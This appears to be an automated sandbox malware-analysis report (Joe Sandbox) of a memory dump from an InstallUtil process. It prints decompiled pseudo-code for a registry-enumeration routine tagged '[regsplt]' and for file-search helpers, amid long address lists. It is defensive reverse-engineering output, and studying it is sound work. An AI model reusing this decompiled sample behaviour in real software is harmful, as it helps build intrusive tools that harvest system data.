0x004469a9
0x004469a9
0x004469ab
0x004469d2
0x004469d8
0x004469dd
0x004469c8
0x00446a6b
0x00446a6e
0x00446a6f
0x00446a70
0x00446a71
0x00446a74
0x00446a76
0x00446adb
0x00446ade
0x00446adf
0x00446aee
0x00446aee
0x00446a78
0x00446a7b
0x00446a7d
0x00446aa3
0x00446aa6
0x00446aa9
0x00446aac
0x00446ab3
0x00446ab8
0x00446ac3
0x00446ac8
0x00446ace
0x00446ad3
0x00446ad3
0x00446ad6
0x00000000
0x00446ad6
0x00446aba
0x00446abd
0x00000000
0x00000000
0x00000000
0x00446abf
0x00446a81
0x00446a82
0x00446a84
0x00446a9b
0x00446a86
0x00446a8b
0x00446a96
0x00446a96
0x00000000
0x00446a84
0x004469af
0x004469b2
0x00000000
0x00000000
0x004469bb
0x004469c0
0x00000000
0x004469c5
0x004469a7
0x0044696d
0x00446975
0x0044697b
0x00000000
0x0044697b
0x0044695b
0x0044695e
0x00000000
0x00000000
0x00000000
0x0044695e
0x0044691a
0x00446921
0x00446927
0x00000000
0x0044692c
0x00000000

Strings

E*E, xrefs: 00446A68, 00446A2F, 00446A1F, 00446A0F, 004469D2, 004469BB, 004469BF, 004469D7, 00446A14, 00446A24, 00446A34

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID:
String ID: E*E
API String ID: 0-3771592462
Opcode ID: 23073f2e270f125f4087ef338e56007bd92043c6da3b3d15b3956e0c3027bcc2
Instruction ID: cff878a50e4481dfbe4340fb05c68759466ceb03e33b783c41abd3f940a5f7f1
Opcode Fuzzy Hash: 23073f2e270f125f4087ef338e56007bd92043c6da3b3d15b3956e0c3027bcc2
Instruction Fuzzy Hash: 4551B2B1E006199BEB11DFA9C845FAF7BB4AF4B314F16405BE400B7391D6B89901CB6B

Uniqueness

Uniqueness Score: -1.00%

Function 00410FC9 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 179
registryCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00410FC9(void* __ecx, short* __edx) {
				int _v8;
				int _v12;
				int _v16;
				int _v20;
				int _v24;
				int _v28;
				int _v32;
				char _v56;
				int _v60;
				int _v64;
				int _v68;
				int _v72;
				int _v76;
				struct _FILETIME _v84;
				void* _v95;
				char _v96;
				char _v108;
				char _v132;
				char _v156;
				short _v668;
				short _v1188;
				char _v11188;
				short _v43956;
				void* __ebx;
				void* __edi;
				void* __ebp;
				int _t72;
				long _t73;
				void* _t93;
				long _t103;
				void* _t104;
				void* _t110;
				void* _t140;
				int _t144;
				int _t146;
				void* _t147;
				void* _t148;
				void* _t149;

				_t137 = __edx;
				_t112 = __ecx;
				E00453420();
				_push(_t140);
				_t144 = 0;
				_t110 = __ecx;
				E004337A0(_t140,  &_v1188, 0, 0x208);
				_t149 = _t148 + 0xc;
				_v24 = 0x104;
				_v8 = 0;
				_v12 = 0x3fff;
				RegQueryInfoKeyW(_t110,  &_v1188,  &_v24, 0,  &_v8,  &_v76,  &_v72,  &_v20,  &_v68,  &_v64,  &_v60,  &_v84);
				_t72 = _v8;
				if(_t72 != 0 && _t72 != 0) {
					do {
						_v28 = 0xff;
						_t103 = RegEnumKeyExW(_t110, _t144,  &_v668,  &_v28, 0, 0, 0,  &_v84);
						_t152 = _t103;
						if(_t103 == 0) {
							_t104 = E0040413E(_t110,  &_v56, _t137, _t147, "\n");
							_t137 =  &_v668;
							E0040321D(E004042BC(_t110,  &_v108,  &_v668, _t147, _t152, _t104));
							E00401EC9();
							_t112 =  &_v56;
							E00401EC9();
						}
						_t144 = _t144 + 1;
					} while (_t144 < _v8);
				}
				_t73 = _v20;
				if(_t73 != 0) {
					_t146 = 0;
					if(_t73 != 0) {
						do {
							_v96 = 0;
							_v16 = 0x2710;
							asm("stosd");
							_v12 = 0x3fff;
							asm("stosd");
							asm("stosw");
							asm("stosb");
							_v43956 = 0;
							_t73 = RegEnumValueW(_t110, _t146,  &_v43956,  &_v12, 0,  &_v32,  &_v11188,  &_v16);
							_t156 = _t73;
							if(_t73 == 0) {
								E0043DDD1(_t112, _v32,  &_v96, 0xa);
								_t149 = _t149 + 0xc;
								E0040321D(E004042BC(_t110,  &_v56,  &_v43956, _t147, _t156, E0040413E(_t110,  &_v132, _t137, _t147, "\n")));
								E00401EC9();
								E00401EC9();
								L00403336(E004052D4(_t110,  &_v132,  &_v96, _t147, _t156, E00402053(_t110,  &_v56,  &_v43956, _t147, "\n")));
								E00401F98();
								E00401F98();
								_t93 = E00402053(_t110,  &_v156,  &_v96, _t147, "[regsplt]");
								_t137 = E00402077(_t110,  &_v56,  &_v96, _t147, _t156,  &_v11188, _v16);
								L00403336(E00402E61( &_v132, _t95, _t93));
								E00401F98();
								E00401F98();
								_t112 =  &_v156;
								_t73 = E00401F98();
							}
							_t146 = _t146 + 1;
						} while (_t146 < _v20);
					}
				}
				return _t73;
			}

0x00410fc9
0x00410fc9
0x00410fd1
0x00410fd8
0x00410fde
0x00410fe8
0x00410fea
0x00410fef
0x00410ff2
0x00410ffc
0x00410fff
0x00411030
0x00411036
0x0041103b
0x00411041
0x00411044
0x0041105f
0x00411065
0x00411067
0x00411071
0x00411077
0x0041108c
0x00411094
0x00411099
0x0041109c
0x0041109c
0x004110a1
0x004110a2
0x00411041
0x004110a7
0x004110ac
0x004110b2
0x004110b6
0x004110bc
0x004110be
0x004110c5
0x004110cc
0x004110cd
0x004110d4
0x004110d5
0x004110d7
0x004110da
0x004110ff
0x00411105
0x00411107
0x00411116
0x0041111b
0x00411141
0x00411149
0x00411151
0x00411176
0x0041117e
0x00411186
0x00411196
0x004111ae
0x004111bf
0x004111c7
0x004111cf
0x004111d4
0x004111da
0x004111da
0x004111df
0x004111e0
0x004110bc
0x004110b6
0x004111ef

APIs

RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00411030
RegEnumKeyExW.ADVAPI32 ref: 0041105F
RegEnumValueW.ADVAPI32 ref: 004110FF

Strings

[regsplt], xrefs: 0041118B

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: Enum$InfoQueryValue
String ID: [regsplt]
API String ID: 3554306468-4262303796
Opcode ID: 8d2878a3cde955a3f18606e29b15c21517c555cac481718381af8d94cd52d2b3
Instruction ID: 8daebb2545cb4d6cb090c7e584b7b8e8eeafcaf71e27a4cdc3956974376e0622
Opcode Fuzzy Hash: 8d2878a3cde955a3f18606e29b15c21517c555cac481718381af8d94cd52d2b3
Instruction Fuzzy Hash: EA512E71900219AADB10EBD5DC85EEFB7BDAF04308F10406BF605B6191EF786B49CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0044A3D9 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E0044A3D9(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				char _v6;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v36;
				intOrPtr* _v64;
				intOrPtr _v96;
				intOrPtr* _v100;
				CHAR* _v104;
				signed int _v116;
				char _v290;
				signed int _v291;
				struct _WIN32_FIND_DATAA _v336;
				union _FINDEX_INFO_LEVELS _v340;
				signed int _v344;
				signed int _v348;
				intOrPtr _v440;
				intOrPtr* _t80;
				signed int _t82;
				signed int _t87;
				signed int _t91;
				signed int _t93;
				signed int _t95;
				signed int _t96;
				signed int _t100;
				signed int _t103;
				signed int _t108;
				signed int _t111;
				intOrPtr _t113;
				signed char _t115;
				union _FINDEX_INFO_LEVELS _t123;
				signed int _t128;
				signed int _t131;
				void* _t137;
				void* _t139;
				signed int _t140;
				signed int _t143;
				signed int _t145;
				signed int _t147;
				signed int* _t148;
				signed int _t151;
				void* _t154;
				CHAR* _t155;
				char _t158;
				char _t160;
				intOrPtr* _t163;
				void* _t164;
				intOrPtr* _t165;
				signed int _t167;
				void* _t169;
				intOrPtr* _t170;
				signed int _t174;
				signed int _t178;
				signed int _t179;
				intOrPtr* _t184;
				void* _t193;
				intOrPtr _t194;
				signed int _t196;
				signed int _t197;
				signed int _t199;
				signed int _t200;
				signed int _t202;
				union _FINDEX_INFO_LEVELS _t203;
				signed int _t208;
				signed int _t210;
				signed int _t211;
				void* _t213;
				intOrPtr _t214;
				void* _t215;
				signed int _t219;
				void* _t221;
				signed int _t222;
				void* _t223;
				void* _t224;
				void* _t225;
				signed int _t226;
				void* _t227;
				void* _t228;

				_t80 = _a8;
				_t224 = _t223 - 0x20;
				if(_t80 != 0) {
					_t208 = _a4;
					_t160 = 0;
					 *_t80 = 0;
					_t199 = 0;
					_t151 = 0;
					_v36 = 0;
					_v336.cAlternateFileName = 0;
					_v28 = 0;
					__eflags =  *_t208;
					if( *_t208 == 0) {
						L9:
						_v12 = _v12 & 0x00000000;
						_t82 = _t151 - _t199;
						_v8 = _t160;
						_t191 = (_t82 >> 2) + 1;
						__eflags = _t151 - _t199;
						_v16 = (_t82 >> 2) + 1;
						asm("sbb esi, esi");
						_t210 =  !_t208 & _t82 + 0x00000003 >> 0x00000002;
						__eflags = _t210;
						if(_t210 != 0) {
							_t197 = _t199;
							_t158 = _t160;
							do {
								_t184 =  *_t197;
								_t17 = _t184 + 1; // 0x1
								_v8 = _t17;
								do {
									_t143 =  *_t184;
									_t184 = _t184 + 1;
									__eflags = _t143;
								} while (_t143 != 0);
								_t158 = _t158 + 1 + _t184 - _v8;
								_t197 = _t197 + 4;
								_t145 = _v12 + 1;
								_v12 = _t145;
								__eflags = _t145 - _t210;
							} while (_t145 != _t210);
							_t191 = _v16;
							_v8 = _t158;
							_t151 = _v336.cAlternateFileName;
						}
						_t211 = E0043F7AD(_t191, _v8, 1);
						_t225 = _t224 + 0xc;
						__eflags = _t211;
						if(_t211 != 0) {
							_t87 = _t211 + _v16 * 4;
							_v20 = _t87;
							_t192 = _t87;
							_v16 = _t87;
							__eflags = _t199 - _t151;
							if(_t199 == _t151) {
								L23:
								_t200 = 0;
								__eflags = 0;
								 *_a8 = _t211;
								goto L24;
							} else {
								_t93 = _t211 - _t199;
								__eflags = _t93;
								_v24 = _t93;
								do {
									_t163 =  *_t199;
									_v12 = _t163 + 1;
									do {
										_t95 =  *_t163;
										_t163 = _t163 + 1;
										__eflags = _t95;
									} while (_t95 != 0);
									_t164 = _t163 - _v12;
									_t35 = _t164 + 1; // 0x1
									_t96 = _t35;
									_push(_t96);
									_v12 = _t96;
									_t100 = E0043AD93(_t164, _t192, _v20 - _t192 + _v8,  *_t199);
									_t225 = _t225 + 0x10;
									__eflags = _t100;
									if(_t100 != 0) {
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										E00438659();
										asm("int3");
										_t221 = _t225;
										_push(_t164);
										_t165 = _v64;
										_t47 = _t165 + 1; // 0x1
										_t193 = _t47;
										do {
											_t103 =  *_t165;
											_t165 = _t165 + 1;
											__eflags = _t103;
										} while (_t103 != 0);
										_push(_t199);
										_t202 = _a8;
										_t167 = _t165 - _t193 + 1;
										_v12 = _t167;
										__eflags = _t167 - (_t103 | 0xffffffff) - _t202;
										if(_t167 <= (_t103 | 0xffffffff) - _t202) {
											_push(_t151);
											_t50 = _t202 + 1; // 0x1
											_t154 = _t50 + _t167;
											_t213 = E00441BB3(_t167, _t154, 1);
											_t169 = _t211;
											__eflags = _t202;
											if(_t202 == 0) {
												L34:
												_push(_v12);
												_t154 = _t154 - _t202;
												_t108 = E0043AD93(_t169, _t213 + _t202, _t154, _v0);
												_t226 = _t225 + 0x10;
												__eflags = _t108;
												if(__eflags != 0) {
													goto L37;
												} else {
													_t137 = E0044A7A8(_a12, __eflags, _t213);
													E004427C2(0);
													_t139 = _t137;
													goto L36;
												}
											} else {
												_push(_t202);
												_t140 = E0043AD93(_t169, _t213, _t154, _a4);
												_t226 = _t225 + 0x10;
												__eflags = _t140;
												if(_t140 != 0) {
													L37:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E00438659();
													asm("int3");
													_push(_t221);
													_t222 = _t226;
													_t227 = _t226 - 0x150;
													_t111 =  *0x46c00c; // 0xe1ce05e9
													_v116 = _t111 ^ _t222;
													_t170 = _v100;
													_push(_t154);
													_t155 = _v104;
													_push(_t213);
													_t214 = _v96;
													_push(_t202);
													_v440 = _t214;
													while(1) {
														__eflags = _t170 - _t155;
														if(_t170 == _t155) {
															break;
														}
														_t113 =  *_t170;
														__eflags = _t113 - 0x2f;
														if(_t113 != 0x2f) {
															__eflags = _t113 - 0x5c;
															if(_t113 != 0x5c) {
																__eflags = _t113 - 0x3a;
																if(_t113 != 0x3a) {
																	_t170 = E00451FF0(_t155, _t170);
																	continue;
																}
															}
														}
														break;
													}
													_t194 =  *_t170;
													__eflags = _t194 - 0x3a;
													if(_t194 != 0x3a) {
														L47:
														_t203 = 0;
														__eflags = _t194 - 0x2f;
														if(_t194 == 0x2f) {
															L51:
															_t115 = 1;
															__eflags = 1;
														} else {
															__eflags = _t194 - 0x5c;
															if(_t194 == 0x5c) {
																goto L51;
															} else {
																__eflags = _t194 - 0x3a;
																if(_t194 == 0x3a) {
																	goto L51;
																} else {
																	_t115 = 0;
																}
															}
														}
														asm("sbb eax, eax");
														_v344 =  ~(_t115 & 0x000000ff) & _t170 - _t155 + 0x00000001;
														E004337A0(_t203,  &_v336, _t203, 0x140);
														_t228 = _t227 + 0xc;
														_t215 = FindFirstFileExA(_t155, _t203,  &_v336, _t203, _t203, _t203);
														_t123 = _v340;
														__eflags = _t215 - 0xffffffff;
														if(_t215 != 0xffffffff) {
															_t174 =  *((intOrPtr*)(_t123 + 4)) -  *_t123;
															__eflags = _t174;
															_v348 = _t174 >> 2;
															do {
																__eflags = _v336.cFileName - 0x2e;
																if(_v336.cFileName != 0x2e) {
																	L64:
																	_push(_t123);
																	_push(_v344);
																	_t123 =  &(_v336.cFileName);
																	_push(_t155);
																	_push(_t123);
																	L28();
																	_t228 = _t228 + 0x10;
																	__eflags = _t123;
																	if(_t123 != 0) {
																		goto L54;
																	} else {
																		goto L65;
																	}
																} else {
																	_t178 = _v291;
																	__eflags = _t178;
																	if(_t178 == 0) {
																		goto L65;
																	} else {
																		__eflags = _t178 - 0x2e;
																		if(_t178 != 0x2e) {
																			goto L64;
																		} else {
																			__eflags = _v290;
																			if(_v290 == 0) {
																				goto L65;
																			} else {
																				goto L64;
																			}
																		}
																	}
																}
																goto L58;
																L65:
																_t128 = FindNextFileA(_t215,  &_v336);
																__eflags = _t128;
																_t123 = _v340;
															} while (_t128 != 0);
															_t195 =  *_t123;
															_t179 = _v348;
															_t131 =  *((intOrPtr*)(_t123 + 4)) -  *_t123 >> 2;
															__eflags = _t179 - _t131;
															if(_t179 != _t131) {
																E0043A360(_t155, _t203, _t215, _t195 + _t179 * 4, _t131 - _t179, 4, E0044A3C1);
															}
														} else {
															_push(_t123);
															_push(_t203);
															_push(_t203);
															_push(_t155);
															L28();
															L54:
															_t203 = _t123;
														}
														__eflags = _t215 - 0xffffffff;
														if(_t215 != 0xffffffff) {
															FindClose(_t215);
														}
													} else {
														__eflags = _t170 -  &(_t155[1]);
														if(_t170 ==  &(_t155[1])) {
															goto L47;
														} else {
															_push(_t214);
															_push(0);
															_push(0);
															_push(_t155);
															L28();
														}
													}
													L58:
													__eflags = _v16 ^ _t222;
													return E004318FB(_v16 ^ _t222);
												} else {
													goto L34;
												}
											}
										} else {
											_t139 = 0xc;
											L36:
											return _t139;
										}
									} else {
										goto L22;
									}
									goto L68;
									L22:
									_t196 = _v16;
									 *((intOrPtr*)(_v24 + _t199)) = _t196;
									_t199 = _t199 + 4;
									_t192 = _t196 + _v12;
									_v16 = _t196 + _v12;
									__eflags = _t199 - _t151;
								} while (_t199 != _t151);
								goto L23;
							}
						} else {
							_t200 = _t199 | 0xffffffff;
							L24:
							E004427C2(0);
							goto L25;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t160;
							_t147 = E00451FB0( *_t208,  &_v8);
							__eflags = _t147;
							if(_t147 != 0) {
								_push( &_v36);
								_push(_t147);
								_push( *_t208);
								L38();
								_t224 = _t224 + 0xc;
							} else {
								_t147 =  &_v36;
								_push(_t147);
								_push(0);
								_push(0);
								_push( *_t208);
								L28();
								_t224 = _t224 + 0x10;
							}
							_t200 = _t147;
							__eflags = _t200;
							if(_t200 != 0) {
								break;
							}
							_t208 = _t208 + 4;
							_t160 = 0;
							__eflags =  *_t208;
							if( *_t208 != 0) {
								continue;
							} else {
								_t151 = _v336.cAlternateFileName;
								_t199 = _v36;
								goto L9;
							}
							goto L68;
						}
						L25:
						E0044A783( &_v36);
						_t91 = _t200;
						goto L26;
					}
				} else {
					_t148 = E00439941();
					_t219 = 0x16;
					 *_t148 = _t219;
					E0043862C();
					_t91 = _t219;
					L26:
					return _t91;
				}
				L68:
			}

0x0044a3de
0x0044a3e1
0x0044a3e7
0x0044a3ff
0x0044a402
0x0044a406
0x0044a408
0x0044a40a
0x0044a40c
0x0044a40f
0x0044a412
0x0044a415
0x0044a417
0x0044a46f
0x0044a46f
0x0044a475
0x0044a477
0x0044a482
0x0044a486
0x0044a488
0x0044a48b
0x0044a48f
0x0044a48f
0x0044a491
0x0044a493
0x0044a495
0x0044a497
0x0044a497
0x0044a499
0x0044a49c
0x0044a49f
0x0044a49f
0x0044a4a1
0x0044a4a2
0x0044a4a2
0x0044a4ad
0x0044a4af
0x0044a4b2
0x0044a4b3
0x0044a4b6
0x0044a4b6
0x0044a4ba
0x0044a4bd
0x0044a4c0
0x0044a4c0
0x0044a4ce
0x0044a4d0
0x0044a4d3
0x0044a4d5
0x0044a4df
0x0044a4e2
0x0044a4e5
0x0044a4e7
0x0044a4ea
0x0044a4ec
0x0044a53c
0x0044a53f
0x0044a53f
0x0044a541
0x00000000
0x0044a4ee
0x0044a4f0
0x0044a4f0
0x0044a4f2
0x0044a4f5
0x0044a4f5
0x0044a4fa
0x0044a4fd
0x0044a4fd
0x0044a4ff
0x0044a500
0x0044a500
0x0044a504
0x0044a507
0x0044a507
0x0044a50a
0x0044a50d
0x0044a51a
0x0044a51f
0x0044a522
0x0044a524
0x0044a55e
0x0044a55f
0x0044a560
0x0044a561
0x0044a562
0x0044a563
0x0044a568
0x0044a56c
0x0044a56e
0x0044a56f
0x0044a572
0x0044a572
0x0044a575
0x0044a575
0x0044a577
0x0044a578
0x0044a578
0x0044a581
0x0044a582
0x0044a585
0x0044a588
0x0044a58b
0x0044a58d
0x0044a594
0x0044a596
0x0044a599
0x0044a5a3
0x0044a5a6
0x0044a5a7
0x0044a5a9
0x0044a5bd
0x0044a5bd
0x0044a5c0
0x0044a5ca
0x0044a5cf
0x0044a5d2
0x0044a5d4
0x00000000
0x0044a5d6
0x0044a5da
0x0044a5e3
0x0044a5e9
0x00000000
0x0044a5ec
0x0044a5ab
0x0044a5ab
0x0044a5b1
0x0044a5b6
0x0044a5b9
0x0044a5bb
0x0044a5f2
0x0044a5f4
0x0044a5f5
0x0044a5f6
0x0044a5f7
0x0044a5f8
0x0044a5f9
0x0044a5fe
0x0044a601
0x0044a602
0x0044a604
0x0044a60a
0x0044a611
0x0044a614
0x0044a617
0x0044a618
0x0044a61b
0x0044a61c
0x0044a61f
0x0044a620
0x0044a641
0x0044a641
0x0044a643
0x00000000
0x00000000
0x0044a628
0x0044a62a
0x0044a62c
0x0044a62e
0x0044a630
0x0044a632
0x0044a634
0x0044a63f
0x00000000
0x0044a63f
0x0044a634
0x0044a630
0x00000000
0x0044a62c
0x0044a645
0x0044a647
0x0044a64a
0x0044a663
0x0044a663
0x0044a665
0x0044a668
0x0044a678
0x0044a67a
0x0044a67a
0x0044a66a
0x0044a66a
0x0044a66d
0x00000000
0x0044a66f
0x0044a66f
0x0044a672
0x00000000
0x0044a674
0x0044a674
0x0044a674
0x0044a672
0x0044a66d
0x0044a688
0x0044a68c
0x0044a69a
0x0044a69f
0x0044a6b4
0x0044a6b6
0x0044a6bc
0x0044a6bf
0x0044a6f1
0x0044a6f1
0x0044a6f6
0x0044a6fc
0x0044a6fc
0x0044a703
0x0044a71d
0x0044a71d
0x0044a71e
0x0044a724
0x0044a72a
0x0044a72b
0x0044a72c
0x0044a731
0x0044a734
0x0044a736
0x00000000
0x00000000
0x00000000
0x00000000
0x0044a705
0x0044a705
0x0044a70b
0x0044a70d
0x00000000
0x0044a70f
0x0044a70f
0x0044a712
0x00000000
0x0044a714
0x0044a714
0x0044a71b
0x00000000
0x00000000
0x00000000
0x00000000
0x0044a71b
0x0044a712
0x0044a70d
0x00000000
0x0044a738
0x0044a740
0x0044a746
0x0044a748
0x0044a748
0x0044a750
0x0044a755
0x0044a75d
0x0044a760
0x0044a762
0x0044a776
0x0044a77b
0x0044a6c1
0x0044a6c1
0x0044a6c2
0x0044a6c3
0x0044a6c4
0x0044a6c5
0x0044a6cd
0x0044a6cd
0x0044a6cd
0x0044a6cf
0x0044a6d2
0x0044a6d5
0x0044a6d5
0x0044a64c
0x0044a64f
0x0044a651
0x00000000
0x0044a653
0x0044a653
0x0044a656
0x0044a657
0x0044a658
0x0044a659
0x0044a65e
0x0044a651
0x0044a6dd
0x0044a6e2
0x0044a6ed
0x00000000
0x00000000
0x00000000
0x0044a5bb
0x0044a58f
0x0044a591
0x0044a5ed
0x0044a5f1
0x0044a5f1
0x00000000
0x00000000
0x00000000
0x00000000
0x0044a526
0x0044a529
0x0044a52c
0x0044a52f
0x0044a532
0x0044a535
0x0044a538
0x0044a538
0x00000000
0x0044a4f5
0x0044a4d7
0x0044a4d7
0x0044a543
0x0044a545
0x00000000
0x0044a54a
0x0044a419
0x0044a419
0x0044a41c
0x0044a425
0x0044a428
0x0044a42f
0x0044a431
0x0044a44a
0x0044a44b
0x0044a44c
0x0044a44e
0x0044a453
0x0044a433
0x0044a433
0x0044a436
0x0044a437
0x0044a439
0x0044a43b
0x0044a43d
0x0044a442
0x0044a442
0x0044a456
0x0044a458
0x0044a45a
0x00000000
0x00000000
0x0044a460
0x0044a463
0x0044a465
0x0044a467
0x00000000
0x0044a469
0x0044a469
0x0044a46c
0x00000000
0x0044a46c
0x00000000
0x0044a467
0x0044a54b
0x0044a54e
0x0044a553
0x00000000
0x0044a556
0x0044a3e9
0x0044a3e9
0x0044a3f0
0x0044a3f1
0x0044a3f3
0x0044a3f8
0x0044a557
0x0044a55b
0x0044a55b
0x00000000

APIs

_strpbrk.LIBCMT ref: 0044A428
_free.LIBCMT ref: 0044A545

Part of subcall function 00438659: IsProcessorFeaturePresent.KERNEL32(00000017,0043862B,00000000,0000000A,0000000A,00000000,004182F5,00000022,?,?,00438638,00000000,00000000,00000000,00000000,00000000), ref: 0043865B
Part of subcall function 00438659: GetCurrentProcess.KERNEL32(C0000417,0000000A,00000000), ref: 0043867D
Part of subcall function 00438659: TerminateProcess.KERNEL32(00000000), ref: 00438684

Strings

., xrefs: 0044A6FC
*?, xrefs: 0044A41C

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
String ID: *?$.
API String ID: 2812119850-3972193922
Opcode ID: b1b4c200ef205d8dd3aac9175cc5313b6beca5196626aff0c8f3ad3f0c54b954
Instruction ID: 2566ebba4cd7e072980776b98ba6f3f7a26a6baae37ed828252e9e03c6ce439e
Opcode Fuzzy Hash: b1b4c200ef205d8dd3aac9175cc5313b6beca5196626aff0c8f3ad3f0c54b954
Instruction Fuzzy Hash: FB51E171E40209EFEF10CFA9C881AAEFBB5EF58314F24416EE844E7340E6799E118B55

Uniqueness

Uniqueness Score: -1.00%

Function 0043E445 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E0043E445(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, char _a20) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _t69;
				char _t70;
				intOrPtr* _t71;
				intOrPtr _t74;
				void* _t75;
				void* _t76;
				signed int _t78;
				void* _t79;
				signed int _t81;
				signed char _t87;
				signed char _t90;
				intOrPtr _t91;
				signed int _t96;
				signed int _t101;
				intOrPtr _t102;
				signed int _t105;
				char* _t111;
				signed int _t113;
				signed int _t115;
				intOrPtr _t122;

				_t69 = E00445D3D(_a4);
				_v16 = _t69;
				_v12 = 2;
				_t113 = _t69 >> 6;
				_t101 = (_t69 & 0x0000003f) * 0x30;
				_v32 = _t113;
				_v8 = 0;
				_t70 =  *((intOrPtr*)(0x46d800 + _t113 * 4));
				_v28 = _t70;
				_v20 = _t101;
				if( *((char*)(_t70 + _t101 + 0x29)) != 1) {
					_v12 = 1;
				}
				_t71 = _a4;
				_t102 =  *((intOrPtr*)(_t71 + 8));
				_v24 = _t102;
				if(_t102 != 0) {
					_t105 = _v20;
					asm("cdq");
					_t96 = _t113;
					asm("cdq");
					_t122 =  *_t71 -  *((intOrPtr*)(_t71 + 4)) + _v24;
					_t21 =  &_v28; // 0x43e420
					_t74 =  *_t21;
					asm("adc ebx, edx");
					__eflags =  *(_t74 + _t105 + 0x28) & 0x00000080;
					if(( *(_t74 + _t105 + 0x28) & 0x00000080) == 0) {
						L25:
						_t75 = E004532B0(_t122, _t96, _v12, _v8);
						_t66 =  &_a20; // 0x43e420
						_t76 = E004532B0(_a16,  *_t66, _v12, _v8);
						asm("sbb edx, edi");
						_t78 = _t76 - _t75 + _a8;
						asm("adc edx, [ebp+0x10]");
						L26:
						return _t78;
					}
					_t79 = E00447349(_v16, 0, 0, 2);
					__eflags = _t79 - _a8;
					if(_t79 != _a8) {
						L13:
						_t81 = E00447349(_v16, _a8, _a12, 0) & _t113;
						_t113 = _t113 | 0xffffffff;
						__eflags = _t81 - _t113;
						if(_t81 != _t113) {
							__eflags = _t96;
							if(__eflags > 0) {
								L21:
								asm("cdq");
								_t122 =  *((intOrPtr*)(_a4 + 0x18));
								_t96 = _t113;
								L22:
								__eflags =  *( *((intOrPtr*)(0x46d800 + _v32 * 4)) + _v20 + 0x28) & 0x00000004;
								L23:
								if(__eflags != 0) {
									_t122 = _t122 + 1;
									asm("adc ebx, edi");
								}
								goto L25;
							}
							if(__eflags < 0) {
								L18:
								_t87 =  *(_a4 + 0xc) >> 6;
								__eflags = _t87 & 0x00000001;
								if((_t87 & 0x00000001) == 0) {
									goto L21;
								}
								_t90 =  *(_a4 + 0xc) >> 8;
								__eflags = _t90 & 0x00000001;
								if((_t90 & 0x00000001) != 0) {
									goto L21;
								}
								_t122 = 0x200;
								_t96 = 0;
								goto L22;
							}
							__eflags = _t122 - 0x200;
							if(_t122 > 0x200) {
								goto L21;
							}
							goto L18;
						}
						_t78 = _t113;
						goto L26;
					}
					__eflags = _t113 - _a12;
					if(_t113 != _a12) {
						goto L13;
					}
					_t91 = _a4;
					_v16 = 0;
					_t115 =  *((intOrPtr*)(_t91 + 4)) + _t122;
					__eflags = _t115 -  *((intOrPtr*)(_t91 + 4));
					asm("sbb edx, edx");
					_t113 =  !_t115 & _t115 -  *((intOrPtr*)(_t91 + 4));
					__eflags = _t113;
					if(_t113 == 0) {
						L12:
						__eflags =  *(_t91 + 0xc) >> 0x00000005 & 0x00000001;
						goto L23;
					}
					_t111 =  *((intOrPtr*)(_t91 + 4));
					do {
						__eflags =  *_t111 - 0xa;
						if( *_t111 == 0xa) {
							_t122 = _t122 + 1;
							asm("adc ebx, edi");
						}
						_t111 = _t111 + 1;
						_v16 = _v16 + 1;
						__eflags = _v16 - _t113;
					} while (_v16 != _t113);
					goto L12;
				} else {
					return _a8;
				}
			}

0x0043e451
0x0043e459
0x0043e45e
0x0043e465
0x0043e46b
0x0043e470
0x0043e473
0x0043e476
0x0043e47d
0x0043e480
0x0043e488
0x0043e48a
0x0043e48a
0x0043e491
0x0043e494
0x0043e497
0x0043e49c
0x0043e4b1
0x0043e4b4
0x0043e4b8
0x0043e4bd
0x0043e4be
0x0043e4c0
0x0043e4c0
0x0043e4c3
0x0043e4c5
0x0043e4ca
0x0043e596
0x0043e59e
0x0043e5ad
0x0043e5b3
0x0043e5ba
0x0043e5bc
0x0043e5bf
0x0043e5c2
0x00000000
0x0043e5c3
0x0043e4d7
0x0043e4df
0x0043e4e2
0x0043e524
0x0043e533
0x0043e538
0x0043e53b
0x0043e53d
0x0043e543
0x0043e545
0x0043e572
0x0043e578
0x0043e579
0x0043e57b
0x0043e57d
0x0043e58a
0x0043e58f
0x0043e58f
0x0043e591
0x0043e594
0x0043e594
0x00000000
0x0043e58f
0x0043e54c
0x0043e552
0x0043e558
0x0043e55b
0x0043e55d
0x00000000
0x00000000
0x0043e565
0x0043e568
0x0043e56a
0x00000000
0x00000000
0x0043e56c
0x0043e56e
0x00000000
0x0043e56e
0x0043e54e
0x0043e550
0x00000000
0x00000000
0x00000000
0x0043e550
0x0043e53f
0x00000000
0x0043e53f
0x0043e4e4
0x0043e4e7
0x00000000
0x00000000
0x0043e4e9
0x0043e4ec
0x0043e4f2
0x0043e4f9
0x0043e4fc
0x0043e500
